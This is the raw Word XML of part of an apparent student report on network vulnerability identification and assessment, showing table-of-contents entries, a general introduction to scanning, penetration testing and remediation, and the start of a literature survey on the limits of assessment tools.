          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F264F7" w14:paraId="6470B9E5" w14:textId="77777777" w:rsidTr="00C27E96">
        <w:trPr>
          <w:trHeight w:val="436"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1377" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4897C926" w14:textId="42BA581C" w:rsidR="00F264F7" w:rsidRDefault="00336E0D">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="1" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="11"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6077" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="020C91B2" w14:textId="67FBE4C4" w:rsidR="00F264F7" w:rsidRDefault="00B65A18" w:rsidP="00F264F7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>Port 80 Vulnerability Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1137" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="373E19CE" w14:textId="0BE2C25A" w:rsidR="00F264F7" w:rsidRDefault="00B65A18" w:rsidP="00F264F7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F264F7" w14:paraId="65F2E8C5" w14:textId="77777777" w:rsidTr="00C27E96">
        <w:trPr>
          <w:trHeight w:val="436"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1377" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="539870AA" w14:textId="16B55F9E" w:rsidR="00F264F7" w:rsidRDefault="00336E0D">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="1" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="11"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6077" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A2707DF" w14:textId="37C42FF8" w:rsidR="00F264F7" w:rsidRDefault="00B65A18" w:rsidP="00F264F7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>Port 21 Vulnerability Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1137" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6665AEE1" w14:textId="18982B5D" w:rsidR="00F264F7" w:rsidRDefault="00B65A18" w:rsidP="00F264F7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F264F7" w14:paraId="1EAA7AFE" w14:textId="77777777" w:rsidTr="00C27E96">
        <w:trPr>
          <w:trHeight w:val="436"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1377" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32D8B126" w14:textId="7E1B23E9" w:rsidR="00F264F7" w:rsidRDefault="00336E0D">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="1" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="11"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6077" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E10C1A4" w14:textId="6615E2DF" w:rsidR="00F264F7" w:rsidRDefault="00B65A18" w:rsidP="00F264F7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>Port 110 Vulnerability Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1137" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23E18B51" w14:textId="4B01F5F2" w:rsidR="00F264F7" w:rsidRDefault="00B65A18" w:rsidP="00F264F7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1D35E841" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00A778D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>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B232678" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CHAPTER 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E87AD79" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>INTRODUCTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6616F0AB" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA"/>
    <w:p w14:paraId="191BB7C0" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The Network Vulnerability Identification and Assessment project aims to enhance the security of a computer network by identifying and assessing potential vulnerabilities within the network infrastructure. The project employs a comprehensive approach to systematically analyse and evaluate network components, protocols, and configurations to ensure a robust and secure network environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5764FC3E" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA"/>
    <w:p w14:paraId="582DB8E7" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Key Objectives:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1B62B6" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Network Discovery: The project starts by conducting a thorough network discovery process to identify all devices, servers, routers, and networked systems within the network. This step helps in creating an accurate inventory of assets and provides a foundation for vulnerability assessment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA6D66E" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="717D0C9B" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vulnerability Scanning: Utilizing specialized vulnerability scanning tools and techniques, the project performs automated scans of the network infrastructure. The scans target each device and system to identify known vulnerabilities, misconfigurations, and potential security weaknesses. The scanning process may include both internal and external scans to cover all aspects of the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65597D8F" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3532BC7A" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Penetration Testing: In addition to vulnerability scanning, the project incorporates penetration testing, also known as ethical hacking. This involves simulating real-world attacks to uncover unknown vulnerabilities and assess the network's ability to withstand various threats. Penetration testing includes attempts to exploit identified vulnerabilities and gain unauthorized access to network resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767572E0" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12C5046C" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vulnerability Assessment: Once the vulnerabilities are identified, the project team assesses their potential impact and severity. Each vulnerability is analyzed based on its likelihood of exploitation, the potential consequences of a successful attack, and the level of difficulty to mitigate or remediate. This assessment helps prioritize the vulnerabilities for remediation efforts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B475F41" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA"/>
    <w:p w14:paraId="6C1E070B" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Reporting and Remediation: The project concludes by generating a detailed report that highlights the identified vulnerabilities, their associated risks, and recommended remediation actions. The report provides network administrators and security teams with actionable insights to prioritize and address the vulnerabilities effectively. The project team may also assist in implementing the recommended security measures and retesting the network after remediation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5701274F" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42F80240" w14:textId="77777777" w:rsidR="00336E0D" w:rsidRDefault="00336E0D" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71E931C5" w14:textId="77777777" w:rsidR="00336E0D" w:rsidRDefault="00336E0D" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D385402" w14:textId="77777777" w:rsidR="00336E0D" w:rsidRDefault="00336E0D" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="624DD458" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.2 Purpose and Benefits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED81B38" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>strengthen the security of a computer network by proactively identifying vulnerabilities and assessing their impact. By conducting thorough scans, tests, and assessments, the project aims to achieve the following objectives:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239918B9" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="435641D4" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Identify Vulnerabilities: The project's primary goal is to identify vulnerabilities within the network infrastructure. This includes known vulnerabilities, misconfigurations, weak authentication mechanisms, outdated software versions, and other security weaknesses that could be exploited by attackers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F284CF0" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="281C74BF" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Assess Risks: Once vulnerabilities are identified, the project assesses the associated risks. By evaluating the likelihood of exploitation and potential consequences of successful attacks, network administrators can prioritize remediation efforts and allocate resources effectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B789E4" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A31ED1C" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Strengthen Security Measures: The project provides actionable insights and recommendations for addressing identified vulnerabilities. Network administrators can use this information to implement security measures such as patches, updates, configuration changes, and improved access controls to mitigate the identified risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5862199F" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="467DC96B" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Proactive Defense: By conducting regular vulnerability identification and assessment, the project enables proactive defense against potential threats. It allows organizations to stay ahead of attackers by identifying vulnerabilities before they are exploited, reducing the risk of data breaches, service disruptions, or unauthorized access to critical resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A4F3D9" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D2BADD6" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Compliance and Regulatory Requirements: Many industries and organizations are subject to compliance regulations and standards related to network security. The project helps ensure compliance with these requirements by identifying and addressing vulnerabilities that could lead to non-compliance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E66841" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00A778D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>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7DCC003" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CHAPTER 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABEF301" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>LITERATURE SURVEY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7D44E1" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA"/>
    <w:p w14:paraId="42C84B92" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.1 Existing problems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19080618" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>While network vulnerability assessment methods have significantly evolved and improved over time, there are still some existing problems that organizations may encounter. Here are a few common challenges associated with network vulnerability assessment methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DE8954" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B4747B6" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>False Positives and False Negatives: Vulnerability assessment tools may generate false positive or false negative results. False positives occur when a tool identifies a vulnerability that doesn't actually exist, leading to unnecessary investigation and remediation efforts. False negatives, on the other hand, happen when a tool fails to identify an actual vulnerability, leaving the network exposed to potential threats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2896F60C" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4269F79C" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Limited Scope: Vulnerability assessment tools often focus on known vulnerabilities and common attack vectors, potentially overlooking emerging threats or zero-day vulnerabilities. The tools may not cover all aspects of the network infrastructure, leaving some areas unassessed and vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764CFFEC" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0303024A" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lack of Contextual Understanding: Vulnerability assessment tools may lack the ability to understand the context in which vulnerabilities exist. They may not consider the network's specific configuration, business processes, or custom applications, resulting in inaccurate assessments and recommendations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257B869C" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EE7CB38" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Inaccurate Risk Prioritization: Vulnerability assessment tools typically assign a severity rating to identified vulnerabilities. However, these ratings may not always align with the actual risk posed to the organization. The tools may not take into account factors such as the network's criticality, exposure to external threats, or the presence of compensating controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6BE4D4" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
